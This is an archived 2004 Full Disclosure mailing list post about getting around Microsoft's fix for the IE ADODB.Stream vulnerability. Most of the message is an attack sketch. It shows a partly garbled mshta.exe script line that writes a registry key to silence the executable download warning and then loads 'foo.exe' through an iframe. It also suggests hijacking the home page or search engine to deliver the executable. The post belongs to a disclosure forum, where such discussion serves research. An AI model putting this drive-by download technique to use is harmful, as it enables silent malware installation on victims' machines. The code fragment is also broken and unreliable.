Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Betr.: Re: Fix for IE ADODB.Stream vulnerability is out
From: "http-equiv () excite com" <1 () malware com>
Date: Sat, 3 Jul 2004 02:06:32 -0000

 still have to contend with mshta.exe calling out through the 
iframe and more than likely firewalled long ago, so use it to 
write the registry to kill the download warning, then use it set 
the browser home page as http://www..../foo.exe, that or the 
default search engine.

tons of possibilities.

Well done Matthew !

obj.ShellExecut("mshta.exe","about:<script>var wsh=new 
('HKCR\exefile\EditFlags', 0x38070000, "REG_BINARY");)
</script><iframe src=foo.exe>");


On quick reflection, I completely missed Matthew's point. It's 
brilliant. If you can indeed kill the download dialog, kill it, 
stick a frame in it and bang. If it doesn't work, use the 
regWrite and re-set the adodb.stream instead, and continue on 
your merry way. 


Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]